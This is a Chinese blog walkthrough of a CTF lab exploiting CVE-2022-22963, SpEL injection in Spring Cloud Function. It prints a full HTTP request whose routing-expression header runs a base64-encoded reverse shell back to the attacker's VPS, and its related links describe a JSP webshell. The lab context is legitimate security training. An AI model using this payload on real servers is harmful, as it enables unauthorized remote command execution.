春秋云境:CVE-2022-22963

已于 2024-03-08 12:56:38 修改
阅读量773 收藏 4
点赞数
分类专栏: 春秋云境-靶场 文章标签: 安全 安全漏洞 web安全 网络安全 cve
于 2023-01-20 15:31:43 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/laobanjiull/article/details/128741988
版权

春秋云境:CVE-2022-22963

文章合集春秋云境系列靶场记录(合集)

关注WX:【小白SEC】查看更多内容……

Spring Cloud Function functionRouter SPEL代码执行漏洞:CVE-2022-22963

在这里插入图片描述

漏洞介绍

SpringCloudFunction是SpringBoot开发的一个Servless中间件(FAAS),支持基于SpEL的函数式动态路由。当Spring Cloud Function 启用动态路由functionRouter时, HTTP请求头spring.cloud.function.routing-expression参数存在SPEL表达式注入漏洞,攻击者可通过该漏洞进行远程命令执行。 题目链接为:http://ip:port P.S 卡慢不影响拿flag

解题步骤

  1. 访问URL是报错页面,使用BurpSuite抓包:
    在这里插入图片描述

  2. 访问:进行抓包,发送到【Repeater】模块
    在这里插入图片描述

  3. VPS开启端口监听:

  4. 构造反弹shell命令并进行base64加密:{echo,c2ggLWkgPiYgE2OiCM90YkL2RldyLj3AvMTDAuMS83MDAzIDA+JjE=}|{base64,-d}|{bash,-i}
    在这里插入图片描述

  5. 返回BurpSuite修改数据包为如下:

POST /functionRouter HTTP/1.1
Host: 47.95.3.91:37939
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: COOKIE_LAST_ADMIN_USER=admin; cookies_accepted=1
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("bash -c {echo,c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4xMDAuMS83MDAzIDA+JjE=}|{base64,-d}|{bash,-i}")
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

在这里插入图片描述

  1. 查看VPS,反弹shell成功,查看flag
    在这里插入图片描述

文章合集春秋云境系列靶场记录(合集)

Acczdy
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2022-22963 复现Demo
04-14
CVE-2022-22963 复现Demo,A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it. 存在任何使用问题可以私信本人。
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC
08-10
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version 3.1.1版本 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: ...
CVE-2022-22963 Spring Cloud Function SpEL 远程代码执行漏洞 复现
weixin_45715461的博客
07-10 2436
CVE-2022-22963 Spring Cloud Function SpEL 远程代码执行漏洞 复现
CVE-2022-22963-Spring-Core-RCE图形化利用工具_poc-yaml-cve-2022-22963-spring-spel-rce(1)
2401_83944297的博客
04-17 471
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!如果你能答对70%,找一个安全工作,问题不大。最后给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!对于从来没有接触过网络安全的同学,我们帮你准备了详细的。资源较为敏感,未展示全面,需要的最下面获取。
CVE-2022-22963-Spring-Core-RCE图形化利用工具_poc-yaml-cve-2022-22963-spring-spel-rce
2401_83944297的博客
04-17 481
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!如果你能答对70%,找一个安全工作,问题不大。最后给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!对于从来没有接触过网络安全的同学,我们帮你准备了详细的。资源较为敏感,未展示全面,需要的最下面获取。
Java代码审计之SpEL表达式注入漏洞分析_spel 代码审计
m0_63174618的博客
04-07 718
也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上Linux运维知识点,真正体系化!**
CVE-2022-22963:Spring Cloud Function SpEL 远程代码执行漏洞
m0_67393827的博客
08-14 390
SpringCloud Function作为SpringCloud家族成员最早在2017年提出,旨在为快速发展的Serverless市场提供一个Spring的接入路径,使用SpringCloud Function进行无服务(我这里直接称为函数式编程)的项目开发可以大大节约成本,同时对于SpringBoot熟悉的人可以迅速上手最近Spring Cloud Function组件爆出0day – SpEL表达式注入导致RCE,官方commit中的test已经公开对应细节。...
CVE-2022-22963 SpringCloud Function SpEL注入漏洞分析
阿道夫的博客
01-30 2076
在研究分析了CVE-2022-22980 Spring Data MongoDBSpEL表达式注入漏洞之后,想起之前在spring4shell爆出之前,存在于SpringCloudFunction中的一个SpEL表达式注入漏洞,编号为CVE-2022-22963。在这里对其进行一波分析和学习。
CVE-2022-22963 Spring Cloud Function SpEL 远程代码执行 漏洞复现
热爱学习,喜欢折腾!
08-28 5151
SpringCloud 是一套分布式系统的解决方案,实现就是函数式编程,在视频转码、音视频转换、数据仓库ETL等与状态相关度低的领域运用的比较多。开发者无需关注服务器环境运维等问题上,专注于自身业务逻辑实现即可。在Spring Cloud Function版本3.1.6,3.2.2和更早的不受支持的版本中,当使用路由功能时,用户可以提供特制的SpEL作为路由表达式,这可能导致远程执行代码和访问本地资源。............
【vulhub系列】CVE-2022-22963 Spring Cloud Function SpEL 远程代码执行漏洞复现
Wiofgb的博客
08-28 2942
记录一次CVE-2022-22963 Spring Cloud Function SpEL 远程代码执行漏洞复现
[春秋云镜]CVE-2022-22963
niubi707的博客
11-29 633
[春秋云镜]CVE-2022-22963复现
春秋云境 CVE-2022-4230 夺旗
最新发布
05-02
介绍如何 利用 CVE-2022-4230 的 WP Statistics WordPress 插件13.2.9 漏洞利用。 漏洞描述:WP Statistics WordPress 插件13.2.9之前的版本不会转义参数,这可能允许经过身份验证的用户执行 SQL 注入攻击。默认...
CVE-2013-6117:CVE-2013-6117
04-29
CVE-2013-6117 $ ./CVE-2013-6117 -hOptions: -h, --help display help information -f, --filename File containing list of IP addresses -t, --target Target IP -n, --threads No of concurrent threads ...
Spring Cloud Function SpEL注入漏洞(CVE-2022-22963)分析
AKAMAI_CHINA的博客
01-01 442
2022年3月24日,Pivotal修补了Spring Cloud Function中一个关键的服务器端代码注入漏洞(Spring表达式语言注入),该漏洞有可能导致系统被攻击。
CVE-2022-22963漏洞复现
Tender*的博客
08-10 272
是基于Spring Boot 的函数计算框架,它抽象出所有传输细节和基础架构,允许开发人员保留所有熟悉的工具和流程,并专注于业务逻辑。由于中,RoutingFunction类的apply方法将请求头中的参 数作为Spel表达式进行处理,造成了Spel表达式注入漏洞,未经授权的远程攻击者可利用该漏洞执行任意代码。拉取环境发送如下数据包,expression头中包含的SpEL表达式将会被执行:网页 有ip 说明存在漏洞。
每日一漏洞(cve-2022-22963
jjjj1029056414的博客
07-18 117
复现cve-2022-22963(Spring Cloud Function SpEL表达式命令注入)
春秋云境CVE-2022-29464
07-28
根据引用\[1\],CVE-2022-29464是Orange Tsai发现的WSO2上的严重漏洞。该漏洞是一种未经身份验证的无限制任意文件上传,允许未经身份验证的攻击者通过上传恶意JSP文件在WSO2服务器上获得RCE(远程命令执行)权限。 根据引用\[2\],攻击者可以通过上传名为1.jsp的恶意文件来利用该漏洞。该文件包含了一个表单,其中包含一个名为"cmd"的输入框,攻击者可以在此输入框中输入命令,并通过点击"Run"按钮来执行该命令。该文件还包含了Java代码,用于执行命令并将输出返回给攻击者。 根据引用\[3\],该漏洞的受攻击的上传路由是/fileupload,由FileUploadServlet处理。而Identity.xml是一个配置文件,该文件上的路由(/fileupload)不受IAM(身份和访问管理)保护。 综上所述,CVE-2022-29464是一个严重的漏洞,允许未经身份验证的攻击者通过上传恶意JSP文件在WSO2服务器上获得远程命令执行权限。 #### 引用[.reference_title] - *1* [【春秋云境CVE-2022-29464](https://blog.csdn.net/ZXW_NUDT/article/details/129159816)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [漏洞复现 a.WSO2 文件上传 (CVE-2022-29464)](https://blog.csdn.net/FODKING/article/details/125746993)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值